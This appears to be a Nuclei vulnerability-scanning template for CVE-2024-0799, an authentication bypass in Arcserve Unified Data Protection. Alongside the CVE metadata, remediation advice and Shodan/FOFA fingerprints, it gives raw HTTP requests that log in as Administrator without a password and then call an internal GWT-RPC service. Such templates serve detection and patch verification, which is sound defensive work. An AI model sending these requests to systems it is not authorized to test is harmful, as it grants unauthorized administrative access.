id: CVE-2024-0799

info:
  name: Arcserve Unified Data Protection - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.
  impact: |
    Attackers can bypass authentication, gaining unauthorized access to the system.
  remediation: |
    Update to the latest version of Arcserve Unified Data Protection or apply security patches provided by the vendor.
  reference:
    - https://www.tenable.com/security/research/tra-2024-07
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0799
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0799
    cwe-id: CWE-287
    epss-score: 0.37884
    epss-percentile: 0.9729
    cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: arcserve
    product: udp
    shodan-query: http.favicon.hash:1015186617
    fofa-query: icon_hash="1015186617"
  tags: cve,cve2024,arcserve,auth-bypass,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /management/wizardLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=Administrator

    matchers:
      - type: dsl
        dsl:
          - "status_code == 302"
          - "contains_all(set_cookie, 'EDGEJSESSIONID','notShowWizard')"
        condition: and
        internal: true

  - raw:
      - |
        POST /management/centralmanagementui/service/configuration HTTP/1.1
        Host: {{Hostname}}
        X-Gwt-Permutation: {{randstr}}
        X-GWT-Module-Base: {{RootURL}}/management/centralmanagementui/
        Content-Type: text/x-gwt-rpc; charset=UTF-8

        7|0|7|{{RootURL}}/management/centralmanagementui/|7EAFA18B9A4008517B99DCC53178335B|com.ca.arcserve.edge.app.base.ui.client.components.configuration.ConfigurationService|testDownloadServerConnnectionEdge|com.ca.arcflash.webservice.data.PM.AutoUpdateSettings/2684954155|com.ca.arcflash.webservice.data.PM.ProxySettings/566911631||1|2|3|4|1|5|5|0|3|1|0|0|6|7|0|0|7|80|7|0|1|0|

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "//OK"
          - "//EX"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a004630440220128b494b06dfd3b8e549ea0ffb2d3969d10613b5600af1efdbb936b38213ff8202201d33a5589f3ca825d321edc54ecebcbc5898f085b8f4b89aaed9384a35305732:922c64590222798bb761d5b6d8e72950